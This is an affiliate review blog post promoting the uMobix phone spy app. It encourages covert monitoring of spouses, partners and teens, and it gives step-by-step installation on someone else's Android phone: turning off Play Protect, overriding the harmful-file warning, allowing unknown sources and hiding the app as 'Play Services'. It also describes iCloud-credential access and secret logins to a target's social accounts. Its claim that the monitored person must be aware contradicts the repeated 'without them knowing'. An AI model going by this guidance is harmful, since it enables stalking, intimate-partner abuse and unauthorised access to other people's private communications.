uMobix Review: Everything To Know About This New Monitoring App

Affiliate Disclaimer: SpyDrill is supported by its audience. If you purchase through links on our site, we may earn an affiliate commission at no additional cost to you!

Before reviewing any spyware, Ankit uses all the spy software and apps himself by purchasing the license of the products. All the information shared is based on his personal experience with the apps and screenshots attached show the real-time data from the target device he received while testing them.

uMobix is one of the best spy apps for Android as well as iPhone that I have ever used. It’s the only app that allows you to spy on someone’s social media on iPhone without jailbreaking. Although you don’t get a free trial with this spyware, you do get a free demo which you can use on their website. Moreover, you can get a full refund if you cancel your subscription within 14 days of purchasing uMobix spy app so your money is in safe hands.

You can expect to get all the necessary monitoring features such as text and call log monitoring, location tracking, browser history, etc. Apart from these, there are more advanced features provided with uMobix that make it a full-fledged spy app. Some of those features are:

Social Media Monitoring:  This feature allows you to keep track of all the chats or activity the target person does on any social media or instant messaging platform.

Keylogger: With its keylogger, uMobix spy app can track each and every word that is being typed on the target phone.

Remote Access: uMobix has been working on some advanced features for a long time. With the help of these features, it allows you to get remote access to the target phone’s microphone and camera.

What Made Me Like uMobix?

The biggest plus point of uMobix is its accuracy and the speed with which it syncs the recorded data to your dashboard. It won’t take more than a few minutes to show you what’s happening on the target device. Also, the features such as location tracking, and keylogger provide accurate results which strengthen my trust in this app.

What Is Missing In uMobix?

uMobix is overall a fantastic spy app with all the features that you would ever require to spy on your crush, spouse, or even kids. However, it is missing the Geofencing feature which could be important for tracking your elderly parents or minor kids. Moreover, the remote access feature is still in the development phase. So sometimes it won’t be able to remotely record the audio or video from the target phone’s microphone or camera respectively.

Quick Review

If you are in a hurry and don’t have time to read the entire article then let me give you my quick review of uMobix. Overall, in my opinion, uMobix makes the best spy app for multiple reasons. First, the pricing of the app is decent, secondly, it has all the features you will ever require to spy on someone.

Last but not least, it is highly reliable and provides accurate results. If you don’t have time then you can go for uMobix without reading further. However, if you do have some time I would recommend you read the detailed uMobix review below, you will get a better idea whether it is worth it or not.

SpecsRemark
Free Trial   No
Free Demo   Yes
Money Back Guarantee14 Days
Monthly price$49.99/ month
Supported Operating System Android & iPhone
Works Without Rooting or JailbreakYes
SpyDrill Rating9.3/10

Click Here to Try uMobix

uMobix Detailed Review

As it is going to be a very detailed uMobix spy app review so I’ve provided you with links to read the specific sections of the article. However, I would suggest you read it completely to know the uMobix pros and cons so that you can make an informed decision.

uMobix Live Demo

uMobix doesn’t offer a free trial but you can check their free live demo to get the hang of working and features of the app.

Click Here to Check uMobix Demo

Is uMobix Compatible With Android & iPhone?

A good spying app must support both the major players in the smartphone market. Therefore, uMobix spying app is compatible with Android as well as iOS smartphones.

All the versions of Android running 4 or above are compatible with uMobix. In the case of iOS, every iOS device is compatible with uMobix, irrespective of which version it is running on.

For this article, I have tested the uMobix app on Samsung M12, an Android device running on Android 13.

Dashboard

Things You Can See On The Dashboard

Current location on the map Yes
Last visited addressesYes
Most frequent callsYes
Most frequent SMSYes
Last added contactsYes
Most frequent socials Yes
SitesYes
Browser bookmarksYes

After logging into your uMobix account, you’ll land on the Dashboard, where you’ll find fresh information about your loved one. The first section covers Location, displaying recently visited places on a map. Zooming in and out provides more details.

uMobix Dashboard Location

Just below, you’ll find sections for Most Frequent Calls, Most Frequent SMS, and Last Added Contacts.

While exploring the uMobix dashboard, I discovered you can filter the Most Frequent Calls and SMS by Incoming and Outgoing communications.

uMobix Dashboard

In the Most Frequent Socials section, you can track time spent on various social media apps. For insights into your kid’s online activities, the Sites section reveals visited websites and their frequency.

social and sites in Dashboard

The left side of the Dashboard offers options under categories like General, Social, Media, and Internet, each with features explained below.

Unread Section

Before delving into uMobix’s features, let’s discuss its Unread section. It’s temporary, appearing only with notifications for specific activities. For instance, if there’s Facebook activity, you’ll find it under Unread on the dashboard. Once you read all notifications, this section vanishes.

uMobix unread section

Beyond notifications, you also receive the current Online status of the app in use on the target device. The Unread tab is a valuable addition, keeping you updated in real-time about various target phone activities, ensuring nothing goes unnoticed.

uMobix Spy App Features

1. Calls

Call RecordingNo
Call DurationYes
Caller IDYes
Block CallsYes

The key USP of any spy app is real-time activity tracking, with call monitoring being paramount. uMobix excels in providing comprehensive call logs, including contact details, call nature, duration, and timestamp.

uMobix features - Calls Monitoring

To view call logs separately as incoming or outgoing, use the filter feature. An up arrow in the State option indicates sorting by incoming calls, while a down arrow shows missed or declined calls.

Sorting Call Logs on uMobix

In a recent addition to uMobix’s call monitoring, the Click To Block feature allows remote blocking of contacts. Simply press Block next to a contact, and if needed, Unblock using the same button.

block calls

What Do I Feel: I would have enjoyed it more if uMobix had a call recording feature like KidsGuard Pro or FlexiSPY but it doesn’t. It only shows call logs and the timestamp and lets you block the contact if you want.
What I Loved
  • While testing I saw call logs dated back to April 2019

  • The new call records were updated within 10 minutes

  • Even deleted call records were being shown

What I Didn't Like
  • No option of checking call logs from one particular number

  • It has no call-recording feature

  • Call filtering based on duration is not available

Click Here to Try uMobix

2. Address Book

Changing contacts’ names with different numbers isn’t new; many have done it for various reasons. This practice can make individuals less suspicious, as they may appear to communicate with someone familiar and trusted. Teens, in particular, might keep their contact lists private from family, making monitoring crucial.

uMobix’s Address Book feature helps verify contact names, numbers, and email IDs. It also indicates the contact’s state, showing whether it’s deleted or still present on the phone.

umobix Contacts Monitor

Contacts in the Address Book are initially sorted alphabetically. To reverse the order (Z to A), press the Down arrow next to Name, mirroring the process in the Calls section.

Sorting Contacts

What Do I Feel:  This feature works well, it showed me all the contacts stored on the target phone. However, the newly added contacts did take some time to show up.
What I Loved
  • The supervisor can change the value in the contact list between 10, 20, 30, 50, and 100, depending on how many contacts you want to see at once

  • All the mobile numbers for each contact are shown. So if the teen smartly adds a secondary number under someone’s different contact, you will easily figure that out

What I Didn't Like
  • Recently added contacts are shown as Existing contacts. Therefore, the Address Book requires more polishing

  • No search feature is available for checking out specific contacts. You’ll have to check the list alphabetically

3. Does uMobix Show Deleted Messages?

Whether it’s the 1990s or 2020, SMS remains a preferred communication method for many due to its quick and meaningful nature. With over 5 billion people using messaging today, it’s essential to recognize its significance.

uMobix Messages feature allows monitoring of both outgoing and incoming SMS, including the detection of deleted messages, a notable advantage. Deleted messages are not only detected but also highlighted, ensuring awareness of concealed information.

block message on uMobix

To streamline the process amid a multitude of messages, uMobix offers the Latest Message feature, providing a description of current messages. Clicking the Title reveals the complete conversation, aiding comprehensive monitoring.

Messages Conversation Tracked

Similar to calls, uMobix now allows blocking messages from specific contacts, offering an efficient feature despite a brief delay. While evaluating the uMobix app, I observed the effectiveness of the blocking feature, which ultimately matters most.

What Do I Feel: uMobix has one of the best text message tracking features, it not only records all the incoming and outgoing messages but even shows you the messages that were deleted and even highlights them which no other spy app can do. Also, I loved the fact that you can remotely block a contact so they can never send an SMS again.
What I Loved
  • Deleted messages (even instantly deleted one) are shown on the uMobix portal

  • New messages are synced every 5 minutes

  • Messages and conversations dated 8 months ago were also shown

  • Sorting of messages alphabetically and date-wise is possible

What I Didn't Like
  • Searching for any particular contact’s conversation is not possible

  • Some conversations had multiple replicating messages

4. GPS Location Tracking

Monitoring children’s visited places is crucial, and uMobix’s Location feature provides a comprehensive view of their history.

uMobix offers in-depth monitoring, providing Longitude and Latitude coordinates for precise data.

Location Monitoring

For a clearer view, the View button opens Google Maps, offering detailed information and area names. Personally, I appreciate the Google Maps feature for its utility in finding directions to a target person’s current location, ensuring timely assistance in emergencies.

Locations Detail View Using Google Maps

What Do I Feel: I tested the location tracking feature of the uMobix app very thoroughly and I can say with confidence that it has one of the most accurate location trackers. However, it is missing an important location tracking feature which is Geofencing that can be seen on KidsGuard Pro and mSpy app.
What I Loved
  • Sorting of the locations data is possible based on addresses/locations, longitude, latitude, and even date on which location was tracked

  • Adding support of Google Maps was a nice touch

What I Didn't Like
  • In our case, the Addresses section was not getting updated

  • The map was missing details. It was not able to show the particular area names, shop names, etc.

5. Keylogger

Knowing everything is not possible for everyone. It becomes the responsibility of people like us to make users learn new things. When I press a key on a keyboard it is known as a keystroke. Keylogger is a mechanism that records the keystrokes made on the keyboard.

With the help of keyloggers, recording of the keystrokes is achieved by not giving any notification or warning to the end-user i.e. spouse or teen. And when I talk about the uMobix spy app, the keylogging mechanism is enhanced even further.

uMobix Keylogger preserves all the keystrokes made on the teen or spouse’s phone. On top of it, I have discovered that uMobix even keeps track of everything like where they have typed and when they have typed.

uMobix Review - Keylogger Feature

Are you worried about the late-night chatting of your girlfriend/boyfriend with others? If yes, then uMobix can help you out by showing what they are chatting about.

uMobix Keylogger feature comes with a search bar from where you can search specific words or any particular app like WhatsApp. In my case, I searched “sneaking” and I found out that the word had been used on WhatsApp on 7th July.

Keylogger Monitoring Feature

What Do I Feel: The keylogger feature of uMobix is one of the best I have ever used on any spy app. It tracks all the words typed on the target phone be it in the browser, notepad, or calculator. Moreover, it syncs the recorded keystrokes immediately, given that the target phone is connected to the internet.
What I Loved
  • All the keystrokes performed by the target user are monitored

  • Information like the time when a keystroke was performed and apps on which it has been typed is also tracked

  • The search bar makes monitoring specific words very simple

  • Sorting data based on the app name and date is possible

  • Keystrokes made in the incognito mode (private mode) of any browser were recorded

  • uMobix keylogger provides you with a clipboard feature as well. It shows you the content copied and pasted by the end-user

What I Didn't Like
  • You cannot check with whom the conversion is going on. As in my case, I know my nephew was planning to sneak out but I didn’t know with whom

Click Here to Try uMobix

6. Social

WhatsAppYes
SnapchatYes
Facebook MessengerYes
TinderYes
TikTokYes
ZoomYes
InstagramYes
ViberYes
TelegramYes
WeChatYes
SkypeYes
HangoutYes
KikYes
LineYes

Monitoring of Calls, Contacts, SMS, Locations, and Keystrokes was not a problem for uMobix. But one other interesting feature that uMobix has put on the table is Display Recording. uMobix Display Recording feature will enable you to see screenshots of all the social media applications used by the target person.

You will get all the screenshots while your spouse is scrolling through Facebook, chatting on Instagram, sending snaps via Snapchat, and so on.

The best part about this feature that I came across while analyzing the uMobix app was that the end-user i.e. spouse or teen will not be aware of such screenshots taken on their phone without their permission.

Monitoring Social Apps on uMobix

The Social apps that you see on the left side of the portal are the ones supported by uMobix, like Facebook, WhatsApp, Snapchat, Facebook Messenger, Tinder, Instagram, Telegram, and so on.

To check one’s activity you have to click on the specific app.

The general working of social apps remains the same. All the real-time screenshots will be taken and shown on the app’s respective section, irrespective of whatever that person is doing inside the app.

Does uMobix Monitor WhatsApp?

Here in the below screenshot, my nephew was chatting with someone on WhatsApp. As you can see it’s the full-screen screenshot with every detail like conversion with the timestamp, the profile picture of the other person, and so on.

WhatsApp Tracking

All the text that you see on the screen (above screenshot) will also be tracked in the keylogger. With the help of its keylogger, uMobix also lets you even see the deleted WhatsApp messages that are typed by the target person. So you can use various features to monitor your partner completely.

uMobix Snapchat Recorder

Snapchat is not like WhatsApp. The reason for stating that is, on Snapchat if you send a message and the other person sees it and leaves the chat the message will be deleted.

Moreover, whenever someone takes a screenshot the other person gets a notification regarding the same. So I was very skeptical about whether the uMobix display recording would work or not.

Spying on Snapchat - uMobix review

As you can see in the above picture no notification has been sent while taking the screenshot! To my surprise, it worked very well.

The Discover section on Snapchat shows stories from friends as well as celebrities and models. So, it’s quite possible that the kid might get exposed to some adult and inappropriate stories.

So monitoring this section is as important as the chats. I am happy to report that it also works as expected!

Click Here to Try uMobix

uMobix Instagram And Facebook Tracking

Just like WhatsApp and Snapchat, uMobix Display Recording should have taken care of Instagram and Facebook as well and provided the supervisor with detailed screenshots.

However, in my testing, I was not able to receive anything from Facebook and Instagram beyond their respective logos. It can be some problem from my end and most probably it will work for you.

Edit: I again tested this app with a new target device (Samsung M12) and this time it tracked all the Facebook and Instagram activities with ease.

facebook tracking
Target phone Facebook activity when testing on Samsung M12
What Do I Feel: I have used almost every spy app in the market, but when it comes to social media there’s hardly any spy app better than uMobix. I really like how it can track all the social media platforms without rooting the target phone. Also, it provides an exclusive online status feature that shows you which social media app is currently being used by the target person.
What I Loved
  • No notification of any screenshot is given to the end-user

  • Sorting of screenshots on every app is possible with the date of origin

What I Didn't Like
  • None

7. Media

Monitoring general and social apps is crucial, but full protection involves overseeing media content like Photos and Videos. uMobix’s Media feature provides insight into what your spouse or teen is keeping and hiding.

Photos

This uMobix feature reveals images on the target device, both in Internal storage and the Micro SD card. Details include the photo’s name and arrival time.

Monitoring Photos

During testing, I accessed pictures dating back to 2017. uMobix allows arranging pictures, with options to sort based on arrival time.

Concerned about WhatsApp images? uMobix has it covered. Every picture shared (received or sent) via WhatsApp is monitored, ensuring comprehensive oversight.

What I Loved
  • Shared and deleted images over WhatsApp are recorded

  • Photos that are even transferred via Bluetooth will be tracked

  • Servers are updated every 10 minutes for the recent pictures

What I Didn't Like
  • The preview of the images is fixed and you cannot change the view or zoom in/out in the picture

Videos

Here, all the videos on the target phone are to be monitored. During my usage, I was able to see videos from 2019! Besides videos, important information like the name and time of arrival of the video is also shown to the supervisor.

Tracking Videos

As you can see above there are a few controls given, and these controls will let you play/pause, minimize/maximize the video.

Along with those, there’s a hamburger icon (marked above in a circle) which will provide you options for Picture In Picture and Download.

Picture In Picture will allow you to watch the video in a slightly bigger size. Also, it will let you multitask by letting you work on other things on your computer if you want to.

Picture In Picture Mode Videos

The downloading feature will come in handy when you find something inappropriate and want to preserve it for the right time. Clicking the Download button will instantly start downloading the video.

Downloading Videos

What Do I Feel:  I loved the Media feature, it provides all the multimedia content stored on the target phone be it photos or videos they have captured or downloaded from somewhere. With the help of this feature, I was able to figure out what type of content the target person consumes.
What I Loved
  • Videos don’t take much time to buffer or download

  • Videos dating back to 2 years ago were also available for viewing

  • Sorting videos based on their time of origin is also feasible

What I Didn't Like
  • Most of the recently received videos were not updated on the uMobix portal

8. Internet

The Internet is integral from childhood, but as teens seek independence, monitoring becomes essential. Spy apps like uMobix offer a solution.

uMobix Browser History alleviates concerns, detailing recent web searches, dates, and visit counts. Data can be sorted by Title, URL, Last visit, and visit frequency, offering insight into teens’ online activity.

Spying on Browser History of Spouse

uMobix’s advanced mechanism preserves all searches on its servers. Even if deleted on the device, uMobix retains it, including searches in incognito or private mode.

The WiFi section tracks connected routers and hotspots. Parents can view and manage networks, even blocking specific ones with a click. This feature effectively regulates children’s internet usage.

WiFi logs

What Do I Feel: I personally liked this feature of uMobix very much, it helped me track all the web pages visited by the target person. More so it was able to track the searches made in the incognito tab as well which is a great thing. Also, it can block a particular WiFi network to which the target phone is connected. However, I was missing the block website feature on it which is available in the mSpy app.
What I Loved
  • Deleted history is always there on uMobix

  • Visited web pages are updated every 10 minutes

  • Incognito searches are also saved

  • Block WiFi

What I Didn't Like
  • While testing, the titles of the web pages were never shown

  • Bookmarks saved on the target device were never synced

9. Application And App Activity

The next two features you get to see on uMobix are Applications and App Activity. Under Applications, you get details of all the apps installed on the target device and you can even completely block or delete them if you feel that some apps are not appropriate for your kids.

applications

On the other hand, in the App Activity section, you get to know about the activity duration of a particular app on your kid’s phone. It also shows you the current status of the app i.e. whether it is currently being used or closed. This helps you keep track of your child’s screen time and most importantly what types of apps they spend the most time on.

activity durations

What Do I Feel: It is a good parental control feature, using it parents can remotely block apps they feel are inappropriate for their children. It even provides the app usage time, so it’s good for tracking the screen time of kids. In my testing, the feature worked well, I have no complaints about it.
What I Loved
  • You can remotely lock or delete an app from the target device
  • Shows which app is currently active on the phone
  • You can also see the state of the apps i.e. whether they’re installed, deleted, active, or closed

What I Didn't Like
  • App blocking takes some time
  • The app usage duration is not entirely correct, it just gives you a fair idea

10. Newly Added Features

Audio Stream

Apart from photos and videos, with the uMobix spy app you can even remotely access the microphone of the target device and listen to the surrounding sounds. This will help ensure the safety of your kids and catch a cheating spouse without them knowing. But remember that this feature only works when the phone is in an active state and is connected to the internet at the same time. Also, the audio quality is not super fine but it is understandable.

Video Stream

The video stream function of uMobix is still under development therefore you will see that it won’t work properly sometimes.

When I put it to the test for the first time I didn’t get any results but after a few tries, it was able to provide me with the live stream recorded from the front and rear camera of the target phone. I have recorded my uMobix account activity on my PC to show you guys how it works.

This is a very useful feature as it can help you see where your loved ones are currently and what they are doing without them knowing. You can make sure that your kids are safe this way. However, for this feature to work, the target phone must be connected to the internet and should be awake (active mode).

Photo Snapshot

The other new feature added to uMobix is Photo Snapshot which lets you remotely capture photos from the front or rear camera of the target cell phone. Just like Video and Audio Stream, this feature is also vulnerable to failure because it is still in the experiment phase. I tried multiple times but it didn’t work for me but you can try it yourself it may work for you.

What Do I Feel: I appreciate that uMobix is coming up with advanced monitoring features like these, but at the moment they don’t work well. While testing I found none of these features work up to the mark, I had a conversation regarding this with their customer support. They told me that these features are still under development and will be properly functional in some time.
What I Loved
  • Audio streamed is crisp and clear
  • Video streaming works fine
What I Didn't Like
  • The audio and video stream feature ends automatically after sometime
  • Photo snapshot did not work for me at all

uMobix iPhone Review

iPhone Installation & Setup Guide For uMobix

The process to install and set up uMobix on a target iPhone differs from Android installation. Unlike Android, physical access to the iPhone is not required; instead, you only need the iCloud credentials (Login ID and password) of the target iOS device.

However, you must note that Apple’s 2-factor authentication (2FA) adds a layer of privacy protection. If enabled on the target device, certain spying features become unavailable. Moreover, with 2FA, physical access is needed to obtain the OTP sent by Apple, and the user receives notifications about access attempts.

If you want to spy on iOS devices without jailbreak then it’s only possible through iCloud. However, iCloud backup must be enabled on the target device. The iCloud monitoring allows access to details like photos, videos, contacts, documents, and more associated with that iCloud account.

To sum it up if you want to spy on any iOS device without jailbreaking it, you’ll need the iCloud credentials, 2FA disabled, and iCloud backup turned on on the device.

Click Here to Try uMobix iPhone Tracker

uMobix iPhone Features

You get limited features on uMobix for iPhone when compared to uMobix for Android for obvious reasons that the iPhone is more secure than Android. However, uMobix is always working on new ways to track an iPhone. In this quest, they have found a way to see the social media profiles of the target person using the iPhone without them knowing. This is currently not possible with any spy app out there without jailbreaking but uMobix has done it and we should appreciate them for it.

How they do it is that they get the password and username of the target person’s Instagram & FB account from their iPhone. uMobix spy app then secretly logs into their account and takes screenshots of it and shares it with you. You can see these screenshots under the Social feature of uMobix. Here is an example of how the screenshot looks.

Facebook

uMobix iPhone feature

Instagram

uMobix iPhone review

Currently, this feature only works on limited social media sites but with time uMobix will surely add more social media and instant messaging platforms to it.

What Do I Feel: In my opinion, this is a great feature from uMobix for iPhone users. There’s no other non-jailbroken iPhone spyware that can show you Facebook or Instagram screenshots of the target person except uMobix.

Click Here to Try uMobix iPhone Tracker

How Is uMobix Customer Support: Are They Helpful?

uMobix has one of the best customer support services I have seen on any other spyware. The best part is you don’t have to send an email and then wait for their replies as you can chat with their customer support executives and resolve your issue within minutes. I faced an issue while testing the photo snapshot and video stream feature so I talked with their customer support regarding it. You can find the chat support option on the bottom right side of your uMobix dashboard.

uMobix customer support

Within a few seconds after raising the query, an executive was assigned to me who listened to all of my issues patiently and replied with valid answers. Overall, I am quite satisfied with their customer support.

Is uMobix Undetectable?

uMobix is not detectable as it is installed with a fake name(Play Services) and app icon which makes it look like a system app.

Furthermore, almost every spy app has some impact on the target phone’s performance like heating up the device, consuming the battery, and in some cases even lagging the phone. However, the impact should be as less as possible, or else the target person will get suspicious that there is something wrong with their device. Luckily, with uMobix they won’t get suspicious because it does not have a very significant impact on the phone. It does consume some battery but doesn’t lag or heat up the phone so uMobix doesn’t raise any red flags and hence remains undetected.

uMobix Pricing

Android and iOS plans of uMobix

uMobix offers three plans: monthly, quarterly, and yearly. The plans now merged for both iPhone and Android which are priced at $49.99/month, $27.99/month, and $11.66/month respectively.

Click Here to Check Price On Official Site

uMobix Vs FlexiSPY Features & Pricing Compared

uMobix and FlexiSPY are one of my favorite spy apps and I thought to compare both of them here so that you can know how well uMobix performs compared to other spy apps. Although FlexiSPY is more advanced spyware than uMobix, most of its advanced features work only when the target device is rooted. Whereas on the other hand in the case of uMobix, almost all features work well on a non-rooted phone as well. Also, in terms of pricing, FlexiSPY is more expensive than uMobix.

Now let’s compare uMobix and FlexiSPY features.

FeatureuMobixFlexiSPYComments
Track Deleted Calls & MessagesYesYesBoth the apps can track deleted calls and messages but uMobix can even highlights deleted messages
Call RecordingNoYesuMobix does not support call recording while FlexiSPY can track both cellular and VoIP calls
GPS Location TrackingYesYesBoth apps does great work in tracking the exact GPS location of the target cell phone
GeofenceNoYesuMobix does not feature Geofencing while FlexiSPY can alert you wherever the target person crosses the set boundries
Social MediaYesYesBoth the apps can very well track social media activites but uMobix can track social media activites on iPhone without jailbreaking which FlexiSPY can't do. Even on Android, FlexiSPY can't track all social media platforms without root
Remote AccessYesYesuMobix and FlexiSPY both lets you remotely access the camera and microphone of the target cell phone. However, on uMobix this feature is still under development so it doesn't work as expected all the times
KeyloggerYesYesYou get a good keystroke logger function on both uMobix and FlexiSPY

How To Setup And Use uMobix?

The very step towards monitoring your loved ones is to set up your uMobix account. For setting up your uMobix account you’ll need to

1. To set up uMobix, visit the uMobix official website and click “TRY IT NOW” in the top right.uMobix Sign Up page

2. Next, sign up using your email.

uMobix Create Account

3. After that, choose the target device type (Android or iOS).

uMobix Select The Target Device

4. Next, choose a subscription, and you’ll receive login credentials and a registration code via email. Log in to the uMobix portal using the provided credentials.

uMobix Login Page

5. Keep the registration code handy as you’ll need it for the installation on the target Android device. Ensure you have physical access to the phone during installation, as Android devices require multiple security permissions. This physical access is crucial for a seamless installation process.

uMobix Registration Code

6. Visit the uMobix website, sign up, choose your subscription, and use the provided credentials to log in. Keep the registration code for the installation on the target Android device, ensuring you have physical access to address necessary security permissions during the process.

Click Here to Try uMobix

How To Install uMobix On Android Phone?

If you are familiar with installing spyware on Android devices then it will be like a walk in the park. And even if you’re new to this, I will still make everything for you like a walk in the park.

I will provide you with the best and most detailed information that will make you install the uMobix spy app successfully.

Disabling The Play Protect Option

Before doing anything else you have to disable Play Protect from the Google Play Store and allow permission for installing apps from Unknown sources. Everything will be explained in detail so keep on reading.

1. To disable Play Protect, first, you have to open the Play Store and then tap on the hamburger icon. After tapping the hamburger icon, select Play Protect from the menu.

Disabling Play Protect For uMobix

2. Now you have to select the Settings icon. Once you are in Play Protect Settings, disable Scan apps with Play Protect.

Disabling Scan Apps With Play Protect For uMobix

3. You will receive a popup saying “Turning off app scanning?” Press Turn OFF to successfully disable Play Protect.

Turn Off App Scanning Play Protect for uMobix

Steps To Install uMobix On Target Android Device

Now you are all set to install the uMobix app on the target device. Please follow the below-mentioned sequence to install the app successfully.

The setup file size is just 6.17 MB and it will not take more than 5 minutes for the installation.

1. Open any browser on the target Android phone and go to the app installation page of uMobix by copying the following link (https://app4.space/r/).

download uMobix

The downloading will start as soon as you land on the download page. If you receive a popup saying “This type of file can harm your device. Do you want to keep umobix.apk anyway?” Click OK to continue downloading.

2. After downloading the file you might get an error saying, “For security, your phone is set to block the installation of apps obtained from unknown sources.”

Allow Unknown Sources for uMobix

3. To rectify the error you have to go into Settings on the Android device and navigate to Security. Under security, you will find Device administration. Here, you need to enable Unknown sources. Doing this is important because it will allow the uMobix spy app to be installed on the device.

Allowing app installation from Unknown Sources

4. Once that is done, you have to go back to the Downloads in the browser and select the downloaded uMobix file. This time you will not see any error and installation will commence. Press the INSTALL button.

how to install uMobix

5. The uMobix app is installed on the target device and ready to be Set Up. Tap on Open.

uMobix Android App Installed

6. Now you can read the EULA agreement and then tap to AGREE TO THE EULA terms and conditions to proceed further.

EULA Terms And Conditions For uMobix

7. uMobix will now ask for your permission to enable its keylogger for Android devices. Press ENABLE KEYLOGGER TRACKING to give approval.

Enabling KeyLogger Tracking On uMobix Android App

8. After enabling Keylogger, choose between two permission setup options: ‘Automatic Setup‘ or ‘Manual Setup.’ Opt for manual setup if you prefer controlling permissions for added security. For a quicker installation, select ‘Setup Automatically‘ if you’re short on time. Click the option ‘You can set up the application manually here’ for manual setup.

automatic or manual setup of uMobix

Here I am going to share the steps of both manual and automatic setup so that you get a clear understanding of how to properly install uMobix on the target phone either way.

Automatic Setup

1. If you have opted for automatic setup then the app will automatically give most of the permissions on your behalf. It will ask you to fill out the captcha in order to grant the system permission to the uMobix app. After entering the captcha Activate the permission.

activate uMobix

2. Next, it will ask you to provide screen recording permission. Tap on Start Now and then tap on ENABLE DISPLAY RECORDING.

Enable screen recording

3. Finally, you need to hide the app and provide the registration code that you have received after creating your account. Lastly, click on Complete Installation.

Automatic installation complete

Click Here to Try uMobix

Is uMobix Legit & Safe? My Verdict

uMobix is a legit spy app that works as stated. It can help you track anyone on their phone without their permission. All you need to do is just install it on their phone and then wait for it to sync the recorded data to your account remotely. Also, all the features work very well, so you won’t have any issues with it. I missed the Geofence feature on it but still, the GPS tracking feature works well to track someone’s location.

Is uMobix safe? You may also ask. Then let me tell you that uMobix is totally safe to use. It does not leak any of the data it records on the target phone nor does it cause any damage to it. So you can definitely give uMobix a try.

Click Here to Try uMobix

uMobix Review Video On My YouTube Channel

FAQs

1. Can uMobix Monitor Snapchat?

Yes, uMobix can monitor Snapchat by recording live screens and providing Screenshots, without them knowing!

2.  Can uMobix Be Hidden?

Yes, hiding uMobix is possible at the time of installation on the target device. But this is only possible if you choose to hide the app icon.

3.  Can uMobix Be Installed Remotely?

In the case of an iOS device with 2FA disabled, it’s possible to install the spy app service remotely. But if the 2FA is enabled, you need physical access to the iOS device. In the case of an Android phone, it’s not possible to install the service remotely.

4. Can uMobix See Deleted Messages?

Yes, the messages that are deleted when uMobix is installed can be seen.

5. Does uMobix Cause Any Adverse Effect On The Target Phone?

No, I didn’t find any major issues like heating, battery drop, or lag on the target device while testing it.

6. Is uMobix Legal?

Yes, uMobix is legal but the person you are going to monitor must be aware of it.

7. Do I Need A Rooted Android Phone For uMobix To Work?

No, that’s the beauty of uMobix, you don’t need to root your target Android device for complete working.

8. Do I Need A Jailbroken iPhone For uMobix?

No, it’s not necessary to jailbreak the target iOS device in order to spy with uMobix.

9. Can Deleted Call Records Be Retrieved Using uMobix?

Yes, the Deleted calls are preserved in uMobix even if they are deleted by your girlfriend/boyfriend/kid/employee.

10. Can The uMobix Keylogger Monitor Copy-paste Text?

Yes, uMobix Keylogger also works like a clipboard and monitors copy-pasted texts.

11. Is uMobix Any Good?

Yes, in terms of the price-to-features ratio, it’s a good monitoring app to keep your loved ones safe.

uMobix

9.3

Ease of Installation

9.5/10

Tracking Features

9.0/10

User Interface

9.5/10

Data Sync Speed

9.0/10

Accuracy

9.0/10

Compatibility

10.0/10

Customer Support

9.0/10

Impact On The Target Phone

9.5/10

Value for Money

9.5/10

Pros

  • Tracking of browsing history was impressive
  • Keylogger was working perfectly
  • Keylogger was also showing the copy and pasted data
  • Calls, SMS, and Contacts were updating within minutes
  • Location feature also supported Google Maps for more support
  • uMobix also shows the messages that were sent and deleted immediately
  • The tracking of photos was very instant

Cons

  • Call recording not available
  • No updates in the video section after initial syncing
  • Browser bookmarks were not shown by uMobix
About the Author

Ankit Prasad, an engineer driven by a passion for digital safety, founded SpyDrill to simplify cybersecurity. With a modest approach, Ankit shares insights on parental control and monitoring apps and effective protection measures. His aim is to empower users with practical knowledge, bridging the gap between technology and everyday understanding. An advocate for digital literacy, Ankit's commitment to demystifying cyber threats underscores his dedication to creating a safer online environment for all.

Don't waste your time and money on spying apps or gadgets that won't work!


Subscribe to our newsletter for the best tips, advice and recommendations regarding spying or monitoring a smartphone or PC.

    Leave a Comment